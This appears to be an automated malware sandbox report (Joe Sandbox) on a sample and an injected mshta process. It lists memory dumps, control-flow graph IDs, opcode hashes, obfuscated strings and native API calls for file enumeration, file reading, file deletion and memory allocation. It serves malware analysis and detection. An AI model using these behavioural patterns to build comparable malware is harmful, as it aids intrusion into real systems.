                • API String ID: 2781271927-0
                • Opcode ID: f3f438e52cda2e60b4448464e067bedb86839187e72d7297fdab88595afdc008
                • Instruction ID: eaffe813605437ddebf27fb31fdf074dd2fd9c67e57230c0c90c60acedf23286
                • Opcode Fuzzy Hash: f3f438e52cda2e60b4448464e067bedb86839187e72d7297fdab88595afdc008
                • Instruction Fuzzy Hash: 5EE08C7A2006047BC610EB6ADC48EDB73ACDFC5325F004816FA08A7200CA75B91187F1

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %
                • API String ID: 0-4029820466
                • Opcode ID: 5b9479dde624319e1e08d81779469a0bce8edde2446cea2bc471b51cc31f53ad
                • Instruction ID: 7d0a4b244c15bf942c4b2bdac172c0c4c483f18039073c8229d2d7d879aefe97
                • Opcode Fuzzy Hash: 5b9479dde624319e1e08d81779469a0bce8edde2446cea2bc471b51cc31f53ad
                • Instruction Fuzzy Hash: 362100B6D0121DAF8B00DFE9D8419EFB7F9EF88210F14815EE919EB240E7715A05CBA4


                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 129 3434699-34346e2 131 34346e5-34346f7 call 3448665 129->131 134 3434715-343474e call 3458f65 131->134 135 34346f9-3434703 131->135 138 3434753-3434758 134->138 135->131 136 3434705-3434714 135->136 138->136 139 343475a-3434776 call 3458865 138->139 139->136 142 3434778-343479b call 3459045 139->142 142->136 145 34347a1-34347c4 call 3459045 142->145 145->136 148 34347ca-34347e8 145->148
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edcf0d0271025113baaea795c73b9f0d43d183883e838d2d3676fbac18034db1
                • Instruction ID: 361fd5fcdaf7e0576e269c87304ca7ea38500ad5917bffa23c54fb4107a0c6be
                • Opcode Fuzzy Hash: edcf0d0271025113baaea795c73b9f0d43d183883e838d2d3676fbac18034db1
                • Instruction Fuzzy Hash: 63411FB1D11219AFDB44CF9AC881AEEBBBCEF49750F10415AF914EB240E7B09641CBA4


                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 283 3448545-344859b call 345b955 * 3 call 3459c35 292 34485a4-34485b9 call 3458e75 283->292 293 344859d-34485a3 283->293 292->293 296 34485bb-34485ce call 34598c5 292->296 298 34485d3-34485e3 296->298
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 82315b029737e30e21c69ea86cdf60829a0ab49916ea63ee30603aa927e14094
                • Instruction ID: b5da1a3c835be51cad898e51971acc4487d09ba7b19f4736ec554a1980b92c02
                • Opcode Fuzzy Hash: 82315b029737e30e21c69ea86cdf60829a0ab49916ea63ee30603aa927e14094
                • Instruction Fuzzy Hash: A41173767803057AF720DE568C42FAB775CDF85B50F24401AFF08AE2C2D6A5B81146B8
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae062cf4e1130528d93ad9a2214452a35971f8e86c9e8e4b9cda902310488008
                • Instruction ID: 0eb09d9dbb7c13e72097d64fbe682af6b4abf8d4e4b679962a72fda664e8e523
                • Opcode Fuzzy Hash: ae062cf4e1130528d93ad9a2214452a35971f8e86c9e8e4b9cda902310488008
                • Instruction Fuzzy Hash: 55F0B4B7A102525FD7149E6EAC84B96F79CEB89221F240227F81CDF381D772D41283A4
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b914cd2626a6c29d2f16214733a60749db5ca0f128615ad9bb86b3389feeb6e4
                • Instruction ID: 80d3e1ddd1ea0ed6bdee23099f5fa09a390305d4434d505ea249c3046ab81e93
                • Opcode Fuzzy Hash: b914cd2626a6c29d2f16214733a60749db5ca0f128615ad9bb86b3389feeb6e4
                • Instruction Fuzzy Hash: F2F01CB52002097FD710EF99DC81EEB77ADEFC9751F008519BA18AB241D670BD518BB8
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f93725e24ed1f579387a087c9790d360d289ea67e09254a132eb2aba5884eaa
                • Instruction ID: ba5269579821f906beb649a623e7eaf9d0c08465d4d025b82a3f6b5638d34503
                • Opcode Fuzzy Hash: 7f93725e24ed1f579387a087c9790d360d289ea67e09254a132eb2aba5884eaa
                • Instruction Fuzzy Hash: EDF05E7180520CABDB14CF64D841BDEBBB8EB04320F1043AAE8289B280D63597548785
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 309380db59c3b0c34c7c0a77db34f5973d14fe3099df5af5d2ec450e155048c3
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: A9E08679640205BFC210FA5ACC40FE7775CDFC5750F01401AFA086B241D670B90487F4
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e5521065b6c4434e94dc97268a49119e66ff6fabcab21a72083bb16b5f38695
                • Instruction ID: fd74f3375835a194c76e54198795d816e4f6e2219bee6b6617e039cf6368a753
                • Opcode Fuzzy Hash: 3e5521065b6c4434e94dc97268a49119e66ff6fabcab21a72083bb16b5f38695
                • Instruction Fuzzy Hash: FAD02B378182929A8724DE6D5808481F380E98A2343250333C4AD6F390DA3290128394
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a9258deeda3753f544c5d02b51994ede95215adf95ba81f3ae8d3cc9f2cf774
                • Instruction ID: cb1b39bd271d8ec2371583b4ed9f25bb62e86aab770711b1a0c78f5bdf3edcb9
                • Opcode Fuzzy Hash: 6a9258deeda3753f544c5d02b51994ede95215adf95ba81f3ae8d3cc9f2cf774
                • Instruction Fuzzy Hash: 9C90023544075C4F5A01BA51450046C2333A98B527750114EA4454D14987584D52D54A
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 05F20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5f20000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: #$$$)$.d$/$2h$M$P$Q$Rq$S$W$[$[X$]$]$l~$ns
                • API String ID: 0-372488337
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$456789+/$89:;$<=@@$@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                • API String ID: 0-3592660292
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: `{r$ ;}g$!:ir$7}ff$: =?$;97r$;<&=$>>3}$R$adrz$ae|a$ae|ad$bcb$cggr$d$fba|$gae|$g|br$rrc$|b|`
                • API String ID: 0-3927445087
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ,$20$@=$@g$D{$GM$JH$Un$Z$[$x$}-$D
                • API String ID: 0-3204514973
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: D$\$e$e$i$l$n$r$r$w$x
                • API String ID: 0-685823316
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: +$4$G$N$P$U$Y$s
                • API String ID: 0-1622545119
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: -$-$1$8$_
                • API String ID: 0-1233760830
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: J$ds$q;wz$q;wzds
                • API String ID: 0-4046768835

                Execution Graph

                Execution Coverage:2.5%
                Dynamic/Decrypted Code Coverage:4.2%
                Signature Coverage:1.6%
                Total number of Nodes:448
                Total number of Limit Nodes:70
                APIs
                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0053C2F4
                • FindNextFileW.KERNELBASE(?,00000010), ref: 0053C32F
                • FindClose.KERNELBASE(?), ref: 0053C33A
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Find$File$CloseFirstNext
                • String ID:
                • API String ID: 3541575487-0
                APIs
                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00548CEE
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                APIs
                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00548E43
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: FileRead
                • String ID:
                • API String ID: 2738559852-0
                • Opcode ID: 79f195d18e8dfd77fa293075082fc55903771dd9d482517675d6bad29e94cf4b
                • Instruction ID: 0542f713fe8de0aa2887076542c616aab70c1e5ed87fc6689c99bdf47dece2b9
                • Opcode Fuzzy Hash: 79f195d18e8dfd77fa293075082fc55903771dd9d482517675d6bad29e94cf4b
                • Instruction Fuzzy Hash: B231D8B5A00619AFDB14DF98D885EEFB7B9EF8C714F108219F918A7240D770A811CBA5
                APIs
                • NtAllocateVirtualMemory.NTDLL(0053198E,?,00547B1F,00000000,00000004,00003000,?,?,?,?,?,00547B1F,0053198E,?,00547B1F,00000000), ref: 00549115
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AllocateMemoryVirtual
                • String ID:
                • API String ID: 2167126740-0
                • Opcode ID: 293d039baca88fa560f385584327714ed0b968801d43f2748c2161a9b62c20e3
                • Instruction ID: 13dbee30e0dd6a6d8db5baea2518736cbfdd4f74e65518b6c54b223b855a2e2f
                • Opcode Fuzzy Hash: 293d039baca88fa560f385584327714ed0b968801d43f2748c2161a9b62c20e3
                • Instruction Fuzzy Hash: D5212DB5A00609ABDB14DF98DC85EEFB7B9FF88714F108109F918A7240D770A911CBA5
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: DeleteFile
                • String ID:
                • API String ID: 4033686569-0
                • Opcode ID: 3cdfddb5db184aa6d1131c14b23e02ea293720d82e67bb9644d3c211cea3ed20
                • Instruction ID: 12c40893722d2ab7b0cb2dabadc5abcfcbe39c42aefd1c20daf214e206e6e44a
                • Opcode Fuzzy Hash: 3cdfddb5db184aa6d1131c14b23e02ea293720d82e67bb9644d3c211cea3ed20
                • Instruction Fuzzy Hash: AF11A071A40619BAE620EB64DC86FEF7BACEFC9714F008509F918A7280D7717901CBE5
                APIs
                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00548F24
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Close
                • String ID:
                • API String ID: 3535843008-0
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 28e8e41dbf0d9d0f9643fc0bcd4f763b03060fd7b7f20f079a40097d18982b6b
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: 8EE08C76650616BFD620FA59DC41FEBBBACEFC5724F418029FA08A7242C670B90587F4
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 07088e0c16607023014c369fa4c01bb6c302c1bea9d2e41e4bd059b0d079abe0
                • Instruction ID: b25c38237eff52d0e566a9cd9c40fa2c28b08791993ab4e08c35c5b1184588eb
                • Opcode Fuzzy Hash: 07088e0c16607023014c369fa4c01bb6c302c1bea9d2e41e4bd059b0d079abe0
                • Instruction Fuzzy Hash: 06900231645800129980B1584885547400597E0301B55D011E0474555C8A148A569361
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 67f32ade9ca59e2ec5b42bd5a5497252f14c8cf1b8f8ad5d82e9c6495cd7d7f7
                • Instruction ID: 019dcb51bcc931ff817672ea1ed253d209a5541083722fbe691c9f1720cd0c99
                • Opcode Fuzzy Hash: 67f32ade9ca59e2ec5b42bd5a5497252f14c8cf1b8f8ad5d82e9c6495cd7d7f7
                • Instruction Fuzzy Hash: D5900271641500424980B1584805407600597E1301395D115A05A4561C86188955D269
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 158e80f7354b08cb16e0cddef99f866794a4bdbdd641cb64283b139deda0c9cb
                • Instruction ID: 716a4083ed852f396b6d72ac28530d19b5ffbae37ba9070bb19270d21217740e
                • Opcode Fuzzy Hash: 158e80f7354b08cb16e0cddef99f866794a4bdbdd641cb64283b139deda0c9cb
                • Instruction Fuzzy Hash: F5900235261400020985F558060550B044597D6351395D015F1466591CC62189659321
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 33cad928f40de797ba3e067ecba05c51806f39d49bf0ebcd2a6b2542025d900b
                • Instruction ID: bf31b6c3768fe30ab4d5d6f8ccbbccffe97fe47651bde56e7be57ff51aa4e8ee
                • Opcode Fuzzy Hash: 33cad928f40de797ba3e067ecba05c51806f39d49bf0ebcd2a6b2542025d900b
                • Instruction Fuzzy Hash: 18900435351400030D45F55C07055070047C7D5351355D031F1075551CD731CD71D131
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: de26fb1425fc8eab314c287fc909047b8a1bcebdcdba3e1843a4fa44681be9be
                • Instruction ID: 3b17e3376de4fd9b80e4a211337446d9f6f2f0968f00999fdd034c1fe7ed729b
                • Opcode Fuzzy Hash: de26fb1425fc8eab314c287fc909047b8a1bcebdcdba3e1843a4fa44681be9be
                • Instruction Fuzzy Hash: 5790023124544842D980B1584405A47001587D0305F55D011A00B4695D96258E55F661
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 3ecaed9a28c6e9e10322ad13b5b626d2ab11670dc1237e80f6153f34b73cea73
                • Instruction ID: 3648653788c24c1d745c4956ceb88bd76c26fb4a0e4044a734af4e7bc32aa789
                • Opcode Fuzzy Hash: 3ecaed9a28c6e9e10322ad13b5b626d2ab11670dc1237e80f6153f34b73cea73
                • Instruction Fuzzy Hash: A490023124140802D9C0B158440564B000587D1301F95D015A0075655DCA158B59B7A1
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b2d8f6f4aa92f6ef6c227b852dbd93a8f597d26f15db558b7c81253191880d0d
                • Instruction ID: 18fa499445f7c9f6e15123b158d2dfe000dd180286ca0c305cc4b823988b67e9
                • Opcode Fuzzy Hash: b2d8f6f4aa92f6ef6c227b852dbd93a8f597d26f15db558b7c81253191880d0d
                • Instruction Fuzzy Hash: 9F90023164540802D990B1584415747000587D0301F55D011A0074655D87558B55B6A1
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 50fb61f3d69f6f289be1bcab1ced896b576fcb5768f2e38f4da6e5d6ced439ab
                • Instruction ID: 41e0b4f33edc5c5e926322919a990ac4034c24b57413331d0722e1718782d6dd
                • Opcode Fuzzy Hash: 50fb61f3d69f6f289be1bcab1ced896b576fcb5768f2e38f4da6e5d6ced439ab
                • Instruction Fuzzy Hash: BE900271242400034945B1584415617400A87E0201B55D021E1064591DC5258991A125
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: aa695827fabe02e747effaaeb50c18326fe5f98d67cae6000b069264c224810b
                • Instruction ID: fe50e48ce508164aca17a0201b63354147690c1d2fb8c24ec0ff587b7b662ece
                • Opcode Fuzzy Hash: aa695827fabe02e747effaaeb50c18326fe5f98d67cae6000b069264c224810b
                • Instruction Fuzzy Hash: 8090027124180403D980B5584805607000587D0302F55D011A20B4556E8A298D51A135
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: dc84398325449800f32a98c1523f4418fdeb37d830531c4ad052fa7e3d65106b
                • Instruction ID: 5d95be9b1f27ad78210768049564e53fe2fc818f9db821d9517583df1c176ac4
                • Opcode Fuzzy Hash: dc84398325449800f32a98c1523f4418fdeb37d830531c4ad052fa7e3d65106b
                • Instruction Fuzzy Hash: 3A90023164140502D941B1584405617000A87D0241F95D022A1074556ECA258A92E131
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 32eab6c2173e61c573a9d88a49ee776c2b12c72e30ffd1d77feb43266520bcfd
                • Instruction ID: 9de3572372a84dfab7d4be05f5765f23e2b11a49bdbfbc14c0427453fa3aa7d0
                • Opcode Fuzzy Hash: 32eab6c2173e61c573a9d88a49ee776c2b12c72e30ffd1d77feb43266520bcfd
                • Instruction Fuzzy Hash: 2F900231251C0042DA40B5684C15B07000587D0303F55D115A01A4555CC91589619521
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 69ac2920d9504e0dac9fb200426c1788ecafe6fb111bedeec59cc3c3d35c6d10
                • Instruction ID: 5134836a397d0d00ea8597c709434d2f55cc734bf7d62d56909a67c230a6c417
                • Opcode Fuzzy Hash: 69ac2920d9504e0dac9fb200426c1788ecafe6fb111bedeec59cc3c3d35c6d10
